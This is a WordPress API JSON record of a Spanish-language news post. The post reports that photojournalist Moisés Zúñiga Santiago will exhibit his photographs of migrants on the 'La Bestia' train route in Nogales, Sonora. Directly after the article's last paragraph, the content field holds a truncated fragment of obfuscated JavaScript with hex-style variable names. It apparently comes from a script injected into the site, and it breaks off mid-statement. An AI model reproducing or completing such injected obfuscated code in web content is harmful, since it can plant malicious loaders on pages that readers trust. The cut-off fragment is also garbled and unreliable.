{"id":8310,"date":"2023-01-26T04:29:09","date_gmt":"2023-01-26T04:29:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8310"},"modified":"2023-01-26T04:29:09","modified_gmt":"2023-01-26T04:29:09","slug":"fotoperiodista-coleto-expondra-en-sonora-fotografias-sobre-la-bestia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8310","title":{"rendered":"Fotoperiodista Coleto, expondr\u00e1 en Sonora fotograf\u00edas sobre \u201cLa Bestia\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"682\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-25-at-3.44.52-PM-682x1024.jpeg\" alt=\"\" class=\"wp-image-8311\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-25-at-3.44.52-PM-682x1024.jpeg 682w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-25-at-3.44.52-PM-200x300.jpeg 200w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-25-at-3.44.52-PM-768x1152.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-25-at-3.44.52-PM.jpeg 853w\" sizes=\"auto, (max-width: 682px) 100vw, 682px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>25 de Enero del 2022. San Crist\u00f3bal de Las Casas.- Mois\u00e9s Z\u00fa\u00f1iga Santiago, fotoperiodista coleto reconocido en varios medios de comunicaci\u00f3n nacional como La Jornada y El Universal, expondr\u00e1 una serie de fotograf\u00edas captadas durante un lapso de 15 a\u00f1os en la ruta del tren llamada &#8220;La Bestia&#8221;, en el museo de arte de Nogales, Sonora, del 27 de enero al 24 de febrero.<\/p>\n\n\n\n<p>\u201cEs algo humanitario, tienen que salir de sus pa\u00edses para evitar ser captados por el crimen organizado, llevo 20 a\u00f1os de periodista en M\u00e9xico, cubriendo miradas ind\u00edgenas, grupos organizados de personas que est\u00e1n buscando un mejoramiento com\u00fan en sus vidas, en todo M\u00e9xico, y al regresar a Chiapas en 2016 me acerqu\u00e9 a las fronteras de Tapachula\u201d, dijo en entrevista.<\/p>\n\n\n\n<p>Mencion\u00f3 que ha documentado todo el viaje ida y vuelta en unos 7 a\u00f1os y parti\u00f3 desde Centroam\u00e9rica, pasando por Tapachula, Arriaga, Tenocique, Oaxaca, el Golfo de M\u00e9xico, Veracruz, Tamaulipas, donde hizo retratos de los migrantes desplazados por la violencia.<\/p>\n\n\n\n<p>Detall\u00f3 que fue avanzando con el tren y tambi\u00e9n acompa\u00f1ando a madres de migrantes desaparecidos que viajan por todo M\u00e9xico buscando a sus hijos, \u201ces un problema que nos ha llevado toda la vida, pero se pueden mejorar las condiciones de los migrantes, y se pueden resolver muchos problemas de Centroam\u00e9rica que es lo que obliga a salir de sus pa\u00edses\u201d.<\/p>\n\n\n\n<p>\u201cLas autoridades han impedido que suban al tren y han tomado otras rutas, como la carretera y lo vuelve m\u00e1s peligroso, al principio del a\u00f1o pasado vimos un accidente terrible, cientos de migrantes iban en un tr\u00e1iler y esto ocurre por la ilegalidad viajan hacinados, en transportes poco seguros, coludidos con otras autoridades y dependencias\u201d.<\/p>\n\n\n\n<p>A su opini\u00f3n se podr\u00eda mejorar la condici\u00f3n de los migrantes con visas humanitarias, con la posibilidad de trabajar en territorio mexicano y que Estados Unidas otorgu\u00e9 tambi\u00e9n visas de trabajo y humanitarias.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 25 de Enero del 2022. San Crist\u00f3bal de Las Casas.- Mois\u00e9s Z\u00fa\u00f1iga Santiago, fotoperiodista coleto reconocido en varios medios de comunicaci\u00f3n nacional como La Jornada y El Universal, expondr\u00e1 una serie de fotograf\u00edas captadas durante un lapso de 15 a\u00f1os en la ruta del tren llamada &#8220;La Bestia&#8221;, en el museo de arte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8311,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8310","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8310"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8310\/revisions"}],"predecessor-version":[{"id":8312,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8310\/revisions\/8312"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8311"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}